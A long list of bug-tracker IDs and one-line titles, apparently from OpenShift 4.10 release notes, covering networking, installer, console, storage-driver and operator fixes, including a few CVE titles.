2019809 - [OVN][Upgrade] After upgrade to 4.7.34 ovnkube-master pods are in CrashLoopBackOff/ContainerCreating and other multiple issues at OVS/OVN level
2019827 - Display issue with top-level menu items running demo plugin
2019832 - 4.10 Nightlies blocked: Failed to upgrade authentication, operator was degraded
2019886 - Kuryr unable to finish ports recovery upon controller restart
2019948 - [RFE] Restructuring Virtualization links
2019972 - The Nodes section doesn't display the csr of the nodes that are trying to join the cluster
2019977 - Installer doesn't validate region causing binary to hang with a 60 minute timeout
2019986 - Dynamic demo plugin fails to build
2019992 - instance:node_memory_utilisation:ratio metric is incorrect
2020001 - Update dockerfile for demo dynamic plugin to reflect dir change
2020003 - MCD does not regard "dangling" symlinks as files, attempts to write through them on next backup, resulting in "not writing through dangling symlink" error and degradation.
2020107 - cluster-version-operator: remove runlevel from CVO namespace
2020153 - Creation of Windows high performance VM fails
2020216 - installer: Azure storage container blob where is stored bootstrap.ign file shouldn't be public
2020250 - Replacing deprecated ioutil
2020257 - Dynamic plugin with multiple webpack compilation passes may fail to build
2020275 - ClusterOperators link in console returns blank page during upgrades
2020377 - permissions error while using tcpdump option with must-gather
2020489 - coredns_dns metrics don't include the custom zone metrics data due to CoreDNS prometheus plugin is not defined
2020498 - "Show PromQL" button is disabled
2020625 - [AUTH-52] User fails to login from web console with keycloak OpenID IDP after enable group membership sync feature
2020638 - [4.7] CI conformance test failures related to CustomResourcePublishOpenAPI
2020664 - DOWN subports are not cleaned up
2020904 - When trying to create a connection from the Developer view between VMs, it fails
2021016 - 'Prometheus Stats' of dashboard 'Prometheus Overview' miss data on console compared with Grafana
2021017 - 404 page not found error on knative eventing page
2021031 - QE - Fix the topology CI scripts
2021048 - [RFE] Added MAC Spoof check
2021053 - Metallb operator presented as community operator
2021067 - Extensive number of requests from storage version operator in cluster
2021081 - Missing PolicyGenTemplate for configuring Local Storage Operator LocalVolumes
2021135 - [azure-file-csi-driver] "make unit-test" returns non-zero code, but tests pass
2021141 - "Cluster should allow a fast rollout of kube-apiserver" is failing on single node
2021151 - Sometimes the DU node does not get the performance profile configuration applied and MachineConfigPool stays stuck in Updating
2021152 - imagePullPolicy is "Always" for ptp operator images
2021191 - Project admins should be able to list available network attachment definitions
2021205 - Invalid URL in git import form causes validation to not happen on URL change
2021322 - cluster-api-provider-azure should populate purchase plan information
2021337 - Dynamic Plugins: ResourceLink doesn't render when passed a groupVersionKind
2021364 - Installer requires invalid AWS permission s3:GetBucketReplication
2021400 - Bump documentationBaseURL to 4.10
2021405 - [e2e][automation] VM creation wizard Cloud Init editor
2021433 - "[sig-builds][Feature:Builds][pullsearch] docker build where the registry is not specified" test fail permanently on disconnected
2021466 - [e2e][automation] Windows guest tool mount
2021544 - OCP 4.6.44 - Ingress VIP assigned as secondary IP in ovs-if-br-ex and added to resolv.conf as nameserver
2021551 - Build is not recognizing the USER group from an s2i image
2021607 - Unable to run openshift-install with a vcenter hostname that begins with a numeric character
2021629 - api request counts for current hour are incorrect
2021632 - [UI] Clicking on odf-operator breadcrumb from StorageCluster details page displays empty page
2021693 - Modals assigned modal-lg class are no longer the correct width
2021724 - Observe > Dashboards: Graph lines are not visible when obscured by other lines
2021731 - CCO occasionally down, reporting networksecurity.googleapis.com API as disabled
2021936 - Kubelet version in RPMs should be using Dockerfile label instead of git tags
2022050 - [BM][IPI] Failed during bootstrap - unable to read client-key /var/lib/kubelet/pki/kubelet-client-current.pem
2022053 - dpdk application with vhost-net is not able to start
2022114 - Console logging every proxy request
2022144 - 1 of 3 ovnkube-master pods stuck in clbo after ipi bm deployment - dualstack (Intermittent)
2022251 - wait interval in case of a failed upload due to 403 is unnecessarily long
2022399 - MON_DISK_LOW troubleshooting guide link when clicked, gives 404 error.
2022447 - ServiceAccount in manifests conflicts with OLM
2022502 - Patternfly tables with a checkbox column are not displaying correctly because of conflicting css rules.
2022509 - getOverrideForManifest does not check manifest.GVK.Group
2022536 - WebScale: duplicate ecmp next hop error caused by multiple of the same gateway IPs in ovnkube cache
2022612 - no namespace field for "Kubernetes / Compute Resources / Namespace (Pods)" admin console dashboard
2022627 - Machine object not picking up external FIP added to an openstack vm
2022646 - configure-ovs.sh failure - Error: unknown connection 'WARN:'
2022707 - Observe / monitoring dashboard shows forbidden errors on Dev Sandbox
2022801 - Add Sprint 210 translations
2022811 - Fix kubelet log rotation file handle leak
2022812 - [SCALE] ovn-kube service controller executes unnecessary load balancer operations
2022824 - Large number of sessions created by vmware-vsphere-csi-driver-operator during e2e tests
2022880 - Pipeline renders with minor visual artifact with certain task dependencies
2022886 - Incorrect URL in operator description
2023042 - CRI-O filters custom runtime allowed annotation when both custom workload and custom runtime sections specified under the config
2023060 - [e2e][automation] Windows VM with CDROM migration
2023077 - [e2e][automation] Home Overview Virtualization status
2023090 - [e2e][automation] Examples of Import URL for VM templates
2023102 - [e2e][automation] Cloudinit disk of VM from custom template
2023216 - ACL for a deleted egressfirewall still present on node join switch
2023228 - Remove Tech preview badge on Trigger components 1.6 OSP on OCP 4.9
2023238 - [sig-devex][Feature:ImageEcosystem][python][Slow] hot deploy for openshift python image Django example should work with hot deploy
2023342 - SCC admission should take ephemeralContainers into account
2023356 - Devfiles can't be loaded in Safari on macOS (403 - Forbidden)
2023434 - Update Azure Machine Spec API to accept Marketplace Images
2023500 - Latency experienced while waiting for volumes to attach to node
2023522 - can't remove package from index: database is locked
2023560 - "Network Attachment Definitions" has no project field on the top in the list view
2023592 - [e2e][automation] add mac spoof check for nad
2023604 - ACL violation when deleting a provisioning-configuration resource
2023607 - console returns blank page when normal user without any projects visit Installed Operators page
2023638 - Downgrade support level for extended control plane integration to Dev Preview
2023657 - inconsistent behaviours of adding ssh key on rhel node between 4.9 and 4.10
2023675 - Changing CNV Namespace
2023779 - Fix Patch 104847 in 4.9
2023781 - initial hardware devices are not loading in wizard
2023832 - CCO updates lastTransitionTime for non-Status changes
2023839 - Bump recommended FCOS to 34.20211031.3.0
2023865 - Console css overrides prevent dynamic plug-in PatternFly tables from displaying correctly
2023950 - make test-e2e-operator on kubernetes-nmstate results in failure to pull image from "registry:5000" repository
2023985 - [4.10] OVN idle service cannot be accessed after upgrade from 4.8
2024055 - External DNS added extra prefix for the TXT record
2024108 - Occasionally node remains in SchedulingDisabled state even after update has been completed successfully
2024190 - e2e-metal UPI is permafailing with inability to find rhcos.json
2024199 - 400 Bad Request error for some queries for the non admin user
2024220 - Cluster monitoring checkbox flickers when installing Operator in all-namespace mode
2024262 - Sample catalog is not displayed when one API call to the backend fails
2024309 - cluster-etcd-operator: defrag controller needs to provide proper observability
2024316 - modal about support displays wrong annotation
2024328 - [oVirt / RHV] PV disks are lost when machine deleted while node is disconnected
2024399 - Extra space is in the translated text of "Add/Remove alternate service" on Create Route page
2024448 - When ssh_authorized_keys is empty in form view it should not appear in yaml view
2024493 - Observe > Alerting > Alerting rules page throws error trying to destructure undefined
2024515 - test-blocker: Ceph-storage-plugin tests failing
2024535 - hotplug disk missing OwnerReference
2024537 - WINDOWS_IMAGE_LINK does not refer to windows cloud image
2024547 - Detail page is breaking for namespace store, backing store and bucket class.
2024551 - KMS resources not getting created for IBM FlashSystem storage
2024586 - Special Resource Operator(SRO) - Empty image in BuildConfig when using RT kernel
2024613 - pod-identity-webhook starts without tls
2024617 - vSphere CSI tests constantly failing with Rollout of the monitoring stack failed and is degraded
2024665 - Bindable services are not shown on topology
2024731 - linuxptp container: unnecessary checking of interfaces
2024750 - i18n some remaining OLM items
2024804 - gcp-pd-csi-driver does not use trusted-ca-bundle when cluster proxy configured
2024826 - [RHOS/IPI] Masters are not joining a clusters when installing on OpenStack
2024841 - test Keycloak with latest tag
2024859 - Not able to deploy an existing image from private image registry using developer console
2024880 - Egress IP breaks when network policies are applied
2024900 - Operator upgrade kube-apiserver
2024932 - console throws "Unauthorized" error after logging out
2024933 - openshift-sync plugin does not sync existing secrets/configMaps on start up
2025093 - Installer does not honour diskformat specified in storage policy and defaults to zeroedthick
2025230 - ClusterAutoscalerUnschedulablePods should not be a warning
2025266 - CreateResource route has exact prop which need to be removed
2025301 - [e2e][automation] VM actions availability in different VM states
2025304 - overwrite storage section of the DV spec instead of the pvc section
2025431 - [RFE]Provide specific windows source link
2025458 - [IPI-AWS] cluster-baremetal-operator pod in a crashloop state after patching from 4.7.21 to 4.7.36
2025464 - [aws] openshift-install gather bootstrap collects logs for bootstrap and only one master node
2025467 - [OVN-K][ETP=local] Host to service backed by ovn pods doesn't work for ExternalTrafficPolicy=local
2025481 - Update VM Snapshots UI
2025488 - [DOCS] Update the doc for nmstate operator installation
2025592 - ODC 4.9 supports invalid devfiles only
2025765 - It should not try to load from storageProfile after unchecking "Apply optimized StorageProfile settings"
2025767 - VMs orphaned during machineset scaleup
2025770 - [e2e] non-priv seems looking for v2v-vmware configMap in ns "kubevirt-hyperconverged" while using customize wizard
2025788 - [IPI on azure] Pre-check on IPI Azure should check the VM size's vCPUsAvailable instead of vCPUs for the SKU
2025821 - Make "Network Attachment Definitions" available to regular user
2025823 - The console nav bar ignores plugin separator in existing sections
2025830 - CentOS capitalization is wrong
2025837 - Warn users that the RHEL URL expires
2025884 - External CCM deploys openstack-cloud-controller-manager from quay.io/openshift/origin-
2025903 - [UI] RoleBindings tab doesn't show correct rolebindings
2026104 - [sig-imageregistry][Feature:ImageAppend] Image append should create images by appending them [Skipped:Disconnected] [Suite:openshift/conformance/parallel]
2026178 - OpenShift Alerting Rules Style-Guide Compliance
2026209 - Updating a task fails (Tekton Hub integration)
2026223 - Internal error occurred: failed calling webhook "ptpconfigvalidationwebhook.openshift.io"
2026321 - [UPI on Azure] Shall we remove allowedValue about VMSize in ARM templates
2026343 - [upgrade from 4.5 to 4.6] .status.connectionState.address of catsrc community-operators is not correct
2026352 - Kube-Scheduler revision-pruner fail during install of new cluster
2026374 - aws-pod-identity-webhook go.mod version out of sync with build environment
2026383 - Error when rendering custom Grafana dashboard through ConfigMap
2026387 - node tuning operator metrics endpoint serving old certificates after certificate rotation
2026396 - Cachito Issues: sriov-network-operator Image build failure
2026488 - openshift-controller-manager - delete event is repeating pathologically
2026489 - ThanosRuleRuleEvaluationLatencyHigh fires when a large number of alerts is defined
2026560 - Cluster-version operator does not remove unrecognized volume mounts
2026699 - fixed a bug with missing metadata
2026813 - add Mellanox CX-6 Lx DeviceID 101f NIC support in SR-IOV Operator
2026898 - Description/details are missing for Local Storage Operator
2027132 - Use the specific icon for Fedora and CentOS template
2027238 - "Node Exporter / USE Method / Cluster" CPU utilization graph shows incorrect legend
2027272 - KubeMemoryOvercommit alert should be human readable
2027281 - [Azure] External-DNS cannot find the private DNS zone in the resource group
2027288 - Devfile samples can't be loaded after fixing it on Safari (redirect caching issue)
2027299 - The status of checkbox component is not revealed correctly in code
2027311 - K8s watch hooks do not work when fetching core resources
2027342 - Alert ClusterVersionOperatorDown is firing on OpenShift Container Platform after ca certificate rotation
2027363 - The azure-file-csi-driver and azure-file-csi-driver-operator don't use the downstream images
2027387 - [IBMCLOUD] Terraform ibmcloud-provider buffers entirely the qcow2 image causing spikes of 5GB of RAM during installation
2027498 - [IBMCloud] SG Name character length limitation
2027501 - [4.10] Bootimage bump tracker
2027524 - Delete Application doesn't delete Channels or Brokers
2027563 - e2e/add-flow-ci.feature fix accessibility violations
2027585 - CVO crashes when changing spec.upstream to a cincinnati graph which includes invalid conditional edges
2027629 - Gather ValidatingWebhookConfiguration and MutatingWebhookConfiguration resource definitions
2027685 - openshift-cluster-csi-drivers pods crashing on PSI
2027745 - default samplesRegistry prevents the creation of imagestreams when registrySources.allowedRegistries is enforced
2027824 - ovnkube-master CrashLoopBackoff: panic: Expected slice or struct but got string
2027917 - No settings in hostfirmwaresettings and schema objects for masters
2027927 - sandbox creation fails due to obsolete option in /etc/containers/storage.conf
2027982 - nncp stuck at ConfigurationProgressing
2028019 - Max pending serving CSRs allowed in cluster machine approver is not right for UPI clusters
2028024 - After deleting a SpecialResource, the node is still tagged although the driver is removed
2028030 - Panic detected in cluster-image-registry-operator pod
2028042 - Desktop viewer for Windows VM shows "no Service for the RDP (Remote Desktop Protocol) can be found"
2028054 - Cloud controller manager operator can't get leader lease when upgrading from 4.8 up to 4.9
2028106 - [RFE] Use dynamic plugin actions for kubevirt plugin
2028141 - Console tests doesn't pass on Node.js 15 and 16
2028160 - Remove i18nKey in network-policy-peer-selectors.tsx
2028162 - Add Sprint 210 translations
2028170 - Remove leading and trailing whitespace
2028174 - Add Sprint 210 part 2 translations
2028187 - Console build doesn't pass on Node.js 16 because node-sass doesn't support it
2028217 - Cluster-version operator does not default Deployment replicas to one
2028240 - Multiple CatalogSources causing higher CPU use than necessary
2028268 - Password parameters are listed in FirmwareSchema despite the fact that they cannot and shouldn't be set in HostFirmwareSettings
2028325 - disableDrain should be set automatically on SNO
2028484 - AWS EBS CSI driver's livenessprobe does not respect operator's loglevel
2028531 - Missing netFilter to the list of parameters when platform is OpenStack
2028610 - Installer doesn't retry on GCP rate limiting
2028685 - LSO repeatedly reports errors while diskmaker-discovery pod is starting
2028695 - destroy cluster does not prune bootstrap instance profile
2028731 - The containerruntimeconfig controller has wrong assumption regarding the number of containerruntimeconfigs
2028802 - CRI-O panic due to invalid memory address or nil pointer dereference
2028816 - VLAN IDs not released on failures
2028881 - Override not working for the PerformanceProfile template
2028885 - Console should show an error context if it logs an error object
2028949 - Masthead dropdown item hover text color is incorrect
2028963 - Whereabouts should reconcile stranded IP addresses
2029034 - enabling ExternalCloudProvider leads to inoperative cluster
2029178 - Create VM with wizard - page is not displayed
2029181 - Missing CR from PGT
2029273 - wizard cannot be used if project field is "All Projects"
2029369 - Cypress tests github rate limit errors
2029371 - patch pipeline--worker nodes unexpectedly reboot during scale out
2029394 - missing empty text for hardware devices at wizard review
2029414 - Alibaba Disk snapshots with XFS filesystem cannot be used
2029416 - Alibaba Disk CSI driver does not use credentials provided by CCO / ccoctl
2029521 - EFS CSI driver cannot delete volumes under load
2029570 - Azure Stack Hub: CSI Driver does not use user-ca-bundle
2029579 - Clicking on an Application which has a Helm Release in it causes an error
2029644 - New resource FirmwareSchema - reset_required exists for Dell machines and doesn't for HPE
2029645 - Sync upstream 1.15.0 downstream
2029671 - VM action "pause" and "clone" should be disabled while VM disk is still being imported
2029742 - [ovn] Stale lr-policy-list and snat rules left for egressip
2029750 - CVO keeps restarting because it fails to get the feature gate value during the initial start stage
2029785 - CVO panic when an edge is included in both edges and conditionaledges
2029843 - Downstream ztp-site-generate-rhel8 4.10 container image missing content(/home/ztp)
2030003 - HFS CRD: Attempt to set Integer parameter to non-numeric string value - no error
2030029 - [4.10][goroutine]Namespace stuck terminating: Failed to delete all resource types, 1 remaining: unexpected items still remain in namespace
2030228 - Fix StorageSpec resources field to use correct API
2030229 - Mirroring status card reflect wrong data
2030240 - Hide overview page for non-privileged user
2030305 - Export App job does not complete
2030347 - kube-state-metrics exposes metrics about resource annotations
2030364 - Shared resource CSI driver monitoring is not setup correctly
2030488 - Numerous Azure CI jobs are Failing with Partially Rendered machinesets
2030534 - Node selector/tolerations rules are evaluated too early
2030539 - Prometheus is not highly available
2030556 - Don't display Description or Message fields for alerting rules if those annotations are missing
2030568 - Operator installation fails to parse operatorframework.io/initialization-resource annotation
2030574 - console service uses older "service.alpha.openshift.io" for the service serving certificates.
2030677 - BOND CNI: There is no option to configure MTU on a Bond interface
2030692 - NPE in PipelineJobListener.upsertWorkflowJob
2030801 - CVE-2021-44716 golang: net/http: limit growth of header canonicalization cache
2030806 - CVE-2021-44717 golang: syscall: don't close fd 0 on ForkExec error
2030847 - PerformanceProfile API version should be v2
2030961 - Customizing the OAuth server URL does not apply to upgraded cluster
2031006 - Application name input field is not autofocused when user selects "Create application"
2031012 - Services of type loadbalancer do not work if the traffic reaches the node from an interface different from br-ex
2031040 - Error screen when open topology sidebar for a Serverless / knative service which couldn't be started
2031049 - [vsphere upi] pod machine-config-operator cannot be started due to panic issue
2031057 - Topology sidebar for Knative services shows a small pod ring with "0 undefined" as tooltip
2031060 - Failing CSR Unit test due to expired test certificate
2031085 - ovs-vswitchd running more threads than expected
2031141 - Some pods not able to reach k8s api svc IP 198.223.0.1
2031228 - CVE-2021-43813 grafana: directory traversal vulnerability
2031502 - [RFE] New common templates crash the ui
2031685 - Duplicated forward upstreams should be removed from the dns operator
2031699 - The displayed ipv6 address of a dns upstream should be case sensitive
2031797 - [RFE] Order and text of Boot source type input are wrong
2031826 - CI tests needed to confirm driver-toolkit image contents
2031831 - OCP Console - Global CSS overrides affecting dynamic plugins
2031839 - Starting from Go 1.17 invalid certificates will render a cluster dysfunctional
2031858 - GCP beta-level Role (was: CCO occasionally down, reporting networksecurity.googleapis.com API as disabled)
2031875 - [RFE]: Provide online documentation for the SRO CRD (via oc explain)
2031926 - [ipv6dualstack] After SVC conversion from single stack only to RequireDualStack, cannot curl NodePort from the node itself
2032006 - openshift-gitops-application-controller-0 failed to schedule with sufficient node allocatable resource
2032111 - arm64 cluster, create project and deploy the example deployment, pod is CrashLoopBackOff because the image is built for linux+amd64
2032141 - open the alertrule link in new tab, got empty page
2032179 - [PROXY] external dns pod cannot reach to cloud API in the cluster behind a proxy
2032296 - Cannot create machine with ephemeral disk on Azure
2032407 - UI will show the default openshift template wizard for HANA template
2032415 - Templates page - remove "support level" badge and add "support level" column which should not be hard coded
2032421 - [RFE] UI integration with automatic updated images
2032516 - Not able to import git repo with .devfile.yaml
2032521 - openshift-installer intermittent failure on AWS with "Error: Provider produced inconsistent result after apply" when creating the aws_vpc_dhcp_options_association resource
2032547 - hardware devices table has filter when table is empty
2032565 - Deploying compressed files with a MachineConfig resource degrades the MachineConfigPool
2032566 - Cluster-ingress-router does not support Azure Stack
2032573 - Adopting enforces deploy_kernel/ramdisk which does not work with deploy_iso
2032589 - DeploymentConfigs ignore resolve-names annotation
2032732 - Fix styling conflicts due to recent console-wide CSS changes
2032831 - Knative Services and Revisions are not shown when Service has no ownerReference
2032851 - Networking is "not available" in Virtualization Overview
2032926 - Machine API components should use K8s 1.23 dependencies
2032994 - AddressPool IP is not allocated to service external IP wtih aggregationLength 24
2032998 - Can not achieve 250 pods/node with OVNKubernetes in a multiple worker node cluster
2033013 - Project dropdown in user preferences page is broken
2033044 - Unable to change import strategy if devfile is invalid
2033098 - Conjunction in ProgressiveListFooter.tsx is not translatable
2033111 - IBM VPC operator library bump removed global CLI args
2033138 - "No model registered for Templates" shows on customize wizard
2033215 - Flaky CI: crud/other-routes.spec.ts fails sometimes with an cypress ace/a11y AssertionError: 1 accessibility violation was detected
2033239 - [IPI on Alibabacloud] 'openshift-install' gets the wrong region (‘cn-hangzhou’) selected
2033257 - unable to use configmap for helm charts
2033271 - [IPI on Alibabacloud] destroying cluster succeeded, but the resource group deletion wasn’t triggered
2033290 - Product builds for console are failing
2033382 - MAPO is missing machine annotations
2033391 - csi-driver-shared-resource-operator sets unused CVO-manifest annotations
2033403 - Devfile catalog does not show provider information
2033404 - Cloud event schema is missing source type and resource field is using wrong value
2033407 - Secure route data is not pre-filled in edit flow form
2033422 - CNO not allowing LGW conversion from SGW in runtime
2033434 - Offer darwin/arm64 oc in clidownloads
2033489 - CCM operator failing on baremetal platform
2033518 - [aws-efs-csi-driver]Should not accept invalid FSType in sc for AWS EFS driver
2033524 - [IPI on Alibabacloud] interactive installer cannot list existing base domains
2033536 - [IPI on Alibabacloud] bootstrap complains invalid value for alibabaCloud.resourceGroupID when updating "cluster-infrastructure-02-config.yml" status, which leads to bootstrap failed and all master nodes NotReady
2033538 - Gather Cost Management Metrics Custom Resource
2033579 - SRO cannot update the special-resource-lifecycle ConfigMap if the data field is undefined
2033587 - Flaky CI test project-dashboard.scenario.ts: Resource Quotas Card was not found on project detail page
2033634 - list-style-type: disc is applied to the modal dropdowns
2033720 - Update samples in 4.10
2033728 - Bump OVS to 2.16.0-33
2033729 - remove runtime request timeout restriction for azure
2033745 - Cluster-version operator makes upstream update service / Cincinnati requests more frequently than intended
2033749 - Azure Stack Terraform fails without Local Provider
2033750 - Local volume should pull multi-arch image for kube-rbac-proxy
2033751 - Bump kubernetes to 1.23
2033752 - make verify fails due to missing yaml-patch
2033784 - set kube-apiserver degraded=true if webhook matches a virtual resource
2034004 - [e2e][automation] add tests for VM snapshot improvements
2034068 - [e2e][automation] Enhance tests for 4.10 downstream
2034087 - [OVN] EgressIP was assigned to the node which is not egress node anymore
2034097 - [OVN] After edit EgressIP object, the status is not correct
2034102 - [OVN] Recreate the deleted EgressIP object got InvalidEgressIP warning
2034129 - blank page returned when clicking 'Get started' button
2034144 - [OVN AWS] ovn-kube egress IP monitoring cannot detect the failure on ovn-k8s-mp0
2034153 - CNO does not verify MTU migration for OpenShiftSDN
2034155 - [OVN-K] [Multiple External Gateways] Per pod SNAT is disabled
2034170 - Use function.knative.dev for Knative Functions related labels
2034190 - unable to add new VirtIO disks to VMs
2034192 - Prometheus fails to insert reporting metrics when the sample limit is met
2034243 - regular user can't load template list
2034245 - installing a cluster on aws, gcp always fails with "Error: Incompatible provider version"
2034248 - GPU/Host device modal is too small
2034257 - regular user Create VM missing permissions alert
2034285 - [sig-api-machinery] API data in etcd should be stored at the correct location and version for all resources [Serial] [Suite:openshift/conformance/serial]
2034287 - do not block upgrades if we can't create storageclass in 4.10 in vsphere
2034300 - DU validator policy is NonCompliant after DU configuration completed
2034319 - Negation constraint is not validating packages
2034322 - CNO doesn't pick up settings required when ExternalControlPlane topology
2034350 - The CNO should implement the Whereabouts IP reconciliation cron job
2034362 - update description of disk interface
2034398 - The Whereabouts IPPools CRD should include the podref field
2034409 - Default CatalogSources should be pointing to 4.10 index images
2034410 - Metallb BGP, BFD: prometheus is not scraping the frr metrics
2034413 - cloud-network-config-controller fails to init with secret "cloud-credentials" not found in manual credential mode
2034460 - Summary: cloud-network-config-controller does not account for different environment
2034474 - Template's boot source is "Unknown source" before and after setting enableCommonBootImageImport to true
2034477 - [OVN] Multiple EgressIP objects configured, EgressIPs weren't working properly
2034493 - Change cluster version operator log level
2034513 - [OVN] After update one EgressIP in EgressIP object, one internal IP lost from lr-policy-list
2034527 - IPI deployment fails 'timeout reached while inspecting the node' when provisioning network ipv6
2034528 - [IBM VPC] volumeBindingMode should be WaitForFirstConsumer
2034534 - Update ose-machine-api-provider-openstack images to be consistent with ART
2034537 - Update team
2034559 - KubeAPIErrorBudgetBurn firing outside recommended latency thresholds
2034563 - [Azure] creating a machine with a wrong ephemeralStorageLocation value succeeds
2034577 - Current OVN gateway mode should be reflected on node annotation as well
2034621 - context menu not popping up for application group
2034622 - Allow volume expansion by default in vsphere CSI storageclass 4.10
2034624 - Warn about unsupported CSI driver in vsphere operator
2034647 - missing volumes list in snapshot modal
2034648 - Rebase openshift-controller-manager to 1.23
2034650 - Rebase openshift/builder to 1.23
2034705 - vSphere: storage e2e tests logging configuration data
2034743 - EgressIP: assigning the same egress IP to a second EgressIP object after a ovnkube-master restart does not fail.
2034766 - Special Resource Operator(SRO) - no cert-manager pod created in dual stack environment
2034785 - ptpconfig with summary_interval cannot be applied
2034823 - RHEL9 should be starred in template list
2034838 - An external router can inject routes if no service is added
2034839 - Jenkins sync plugin does not synchronize ConfigMap having label role=jenkins-agent
2034879 - Lifecycle hook's name and owner shouldn't be allowed to be empty
2034881 - Cloud providers components should use K8s 1.23 dependencies
2034884 - ART cannot build the image because it tries to download controller-gen
2034889 - oc adm prune deployments does not work
2034898 - Regression in recently added Events feature
2034957 - update openshift-apiserver to kube 1.23.1
2035015 - ClusterLogForwarding CR remains stuck remediating forever
2035093 - openshift-cloud-network-config-controller never runs on Hypershift cluster
2035141 - [RFE] Show GPU/Host devices in template's details tab
2035146 - "kubevirt-plugin~PVC cannot be empty" shows on add-disk modal while adding existing PVC
2035167 - [cloud-network-config-controller] unable to delete cloudprivateipconfig when deleting
2035199 - IPv6 support in mtu-migration-dispatcher.yaml
2035239 - e2e-metal-ipi-virtualmedia tests are permanently failing
2035250 - Peering with ebgp peer over multi-hops doesn't work
2035264 - [RFE] Provide a proper message for nonpriv user who not able to add PCI devices
2035315 - invalid test cases for AWS passthrough mode
2035318 - Upgrade management workflow needs to allow custom upgrade graph path for disconnected env
2035321 - Add Sprint 211 translations
2035326 - [ExternalCloudProvider] installation with additional network on workers fails
2035328 - Ccoctl does not ignore credentials request manifest marked for deletion
2035333 - Kuryr orphans ports on 504 errors from Neutron
2035348 - Fix two grammar issues in kubevirt-plugin.json strings
2035393 - oc set data --dry-run=server makes persistent changes to configmaps and secrets
2035409 - OLM E2E test depends on operator package that's no longer published
2035439 - SDN Automatic assignment EgressIP on GCP returned node IP adress not egressIP address
2035453 - [IPI on Alibabacloud] 2 worker machines stuck in Failed phase due to connection to 'ecs-cn-hangzhou.aliyuncs.com' timeout, although the specified region is 'us-east-1'
2035454 - [IPI on Alibabacloud] the OSS bucket created during installation for image registry is not deleted after destroying the cluster
2035467 - UI: Queried metrics can't be ordered on Observe->Metrics page
2035494 - [SDN Migration]ovnkube-node pods CrashLoopBackOff after sdn migrated to ovn for RHEL workers
2035515 - [IBMCLOUD] allowVolumeExpansion should be true in storage class
2035602 - [e2e][automation] add tests for Virtualization Overview page cards
2035703 - Roles -> RoleBindings tab doesn't show RoleBindings correctly
2035704 - RoleBindings list page filter doesn't apply
2035705 - Azure 'Destroy cluster' gets stuck when the cluster resource group no longer exists
2035757 - [IPI on Alibabacloud] one master node turned NotReady which leads to installation failed
2035772 - AccessMode and VolumeMode are not preserved for customize wizard
2035847 - Two dashes in the Cronjob / Job pod name
2035859 - the output of opm render doesn't contain olm.constraint which is defined in dependencies.yaml
2035882 - [BIOS setting values] Create events for all invalid settings in spec
2035903 - One redundant capi-operator credential request in “oc adm extract --credentials-requests”
2035910 - [UI] Manual approval options are missing after ODF 4.10 installation starts when Manual Update approval is chosen
2035927 - Cannot enable HighNodeUtilization scheduler profile
2035933 - volume mode and access mode are empty in customize wizard review tab
2035969 - "ip a" shows "Error: Peer netns reference is invalid" after creating test pods
2035986 - Some pods under kube-scheduler/kube-controller-manager are using the deprecated annotation
2036006 - [BIOS setting values] Attempt to set Integer parameter results in preparation error
2036029 - Newly added cloud-network-config operator doesn’t support AWS STS format credentials
2036096 - [azure-file-csi-driver] there are no e2e tests for NFS backend
2036113 - cluster scaling new nodes ovs-configuration fails on all new nodes
2036567 - [csi-driver-nfs] Upstream merge: Bump k8s libraries to 1.23
2036569 - [cloud-provider-openstack] Upstream merge: Bump k8s libraries to 1.23
2036577 - OCP 4.10 nightly builds from 4.10.0-0.nightly-s390x-2021-12-18-034912 to 4.10.0-0.nightly-s390x-2022-01-11-233015 fail to upgrade from OCP 4.9.11 and 4.9.12 for network type OVNKubernetes for zVM hypervisor environments
2036622 - sdn-controller crashes when restarted while a previous egress IP assignment exists
2036717 - Valid AlertmanagerConfig custom resource with a valid mute time interval definition is rejected
2036826 - oc adm prune deployments can prune the RC/RS
2036827 - The ccoctl still accepts CredentialsRequests without ServiceAccounts on GCP platform
2036861 - kube-apiserver is degraded while enabling multitenant
2036937 - Command line tools page shows wrong download ODO link
2036940 - oc registry login fails if the file is empty or stdout
2036951 - [cluster-csi-snapshot-controller-operator] proxy settings is being injected in container
2036989 - Route URL copy to clipboard button wraps to a separate line by itself
2036990 - ZTP "DU Done inform policy" never becomes compliant on multi-node clusters
2036993 - Machine API components should use Go lang version 1.17
2037036 - The tuned profile goes into degraded status and ksm.service is displayed in the log.
2037061 - aws and gcp CredentialsRequest manifests missing ServiceAccountNames list for cluster-api
2037073 - Alertmanager container fails to start because of startup probe never being successful
2037075 - Builds do not support CSI volumes
2037167 - Some log level in ibm-vpc-block-csi-controller are hard code
2037168 - IBM-specific Deployment manifest for package-server-manager should be excluded on non-IBM cluster-profiles
2037182 - PingSource badge color is not matched with knativeEventing color
2037203 - "Running VMs" card is too small in Virtualization Overview
2037209 - [IPI on Alibabacloud] worker nodes are put in the default resource group unexpectedly
2037237 - Add "This is a CD-ROM boot source" to customize wizard
2037241 - default TTL for noobaa cache buckets should be 0
2037246 - Cannot customize auto-update boot source
2037276 - [IBMCLOUD] vpc-node-label-updater may fail to label nodes appropriately
2037288 - Remove stale image reference
2037331 - Ensure the ccoctl behaviors are similar between aws and gcp on the existing resources
2037483 - Rbacs for Pods within the CBO should be more restrictive
2037484 - Bump dependencies to k8s 1.23
2037554 - Mismatched wave number error message should include the wave numbers that are in conflict
2037622 - [4.10-Alibaba CSI driver][Restore size for volumesnapshot/volumesnapshotcontent is showing as 0 in Snapshot feature for Alibaba platform]
2037635 - impossible to configure custom certs for default console route in ingress config
2037637 - configure custom certificate for default console route doesn't take effect for OCP >= 4.8
2037638 - Builds do not support CSI volumes as volume sources
2037664 - text formatting issue in Installed Operators list table
2037680 - [IPI on Alibabacloud] sometimes operator 'cloud-controller-manager' tells empty VERSION, due to conflicts on listening tcp :8080
2037689 - [IPI on Alibabacloud] sometimes operator 'cloud-controller-manager' tells empty VERSION, due to conflicts on listening tcp :8080
2037801 - Serverless installation is failing on CI jobs for e2e tests
2037813 - Metal Day 1 Networking - networkConfig Field Only Accepts String Format
2037856 - use lease for leader election
2037891 - 403 Forbidden error shows for all the graphs in each grafana dashboard after upgrade from 4.9 to 4.10
2037903 - Alibaba Cloud: delete-ram-user requires the credentials-requests
2037904 - upgrade operator deployment failed due to memory limit too low for manager container
2038021 - [4.10-Alibaba CSI driver][Default volumesnapshot class is not added/present after successful cluster installation]
2038034 - non-privileged user cannot see auto-update boot source
2038053 - Bump dependencies to k8s 1.23
2038088 - Remove ipa-downloader references
2038160 - The default project missed the annotation : openshift.io/node-selector: ""
2038166 - Starting from Go 1.17 invalid certificates will render a cluster non-functional
2038196 - must-gather is missing collecting some metal3 resources
